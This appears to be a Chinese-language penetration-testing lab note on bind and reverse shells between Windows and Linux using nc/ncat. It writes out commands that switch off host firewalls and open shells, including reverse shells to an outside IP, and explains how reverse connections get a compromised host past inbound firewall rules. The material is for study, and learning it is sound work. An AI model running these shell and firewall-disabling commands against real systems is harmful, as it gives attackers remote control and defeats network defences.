Day05 实例:正向反向连接内外网环境防火墙出入站
一、正反向连接
0、先将防火墙关闭
Linux: sudo systemctl stop firewalld
Windows:netsh advfirewall set allprofiles state off
1、正向连接
1.1 Linux连接Windows
00x1 开启两台服务器 并且给Windows拖入nc.exe
00x2 Windows绑定自己5566端口 等待Linux的监听
C:\Users\Administrator\Desktop>nc -e cmd -lvvp 5566
00x3 Linux去访问Windows的端口
[root@iZj6c8wqhhs4wojatf6sqgZ ~]# ncat 47.242.11.22 5566
1.2 Windows连接Linux
00x1 关闭Linux的防火墙
sudo systemctl stop firewalld
00x2 Linux绑定自己的端口
ncat -e /bin/sh -lvp 5566
00x3 等待Windows连接Linux的ip端口进行监听 并测试结果
2、反向连接
2.1 Linux连接Windows
00x1 Linux实现本地监听
ncat -lvp 5566
00x2 Windows主动绑定Linux的ip和端口
nc -e cmd 47.242.11.22 5566
00x3 Linux本地监听成功,测试
2.2 Windows连接Linux
00x1 Windows关闭防火墙
netsh advfirewall set allprofiles state off
00x2 Linux主动绑定Windows的ip和端口
ncat -e /bin/sh 47.242.22.11 5566
00x3 Windows实现本地监听
nc -lvp 5566
二、内外网连接
配置要求:vm搭建的win10 + Linux监听
原理:由于win10是nat连接的,利用我本机进行上网,也就共用一个公网ip,所以说只能win10进行反向连接Linux。
步骤:
00x1 Linux去主动监听本地的端口5399
ncat -lvp 5399
00x2 win10主动绑定Linux的ip和端口
C:\Users\admin\Desktop>nc -e cmd 47.242.11.22 5399
00x3 成功监听到win10
测试成功。
三、防火墙出入站
对入站有要求的话,就只能肉鸡去主动绑定攻击机的端口和ip了。那么就是反向连接的过程。
对出站有要求的话,理论上来说是可以进行正向连接,但是防火墙是严进宽出,如果对出都有要求,那么实际情况下进站的话也是会被禁止的。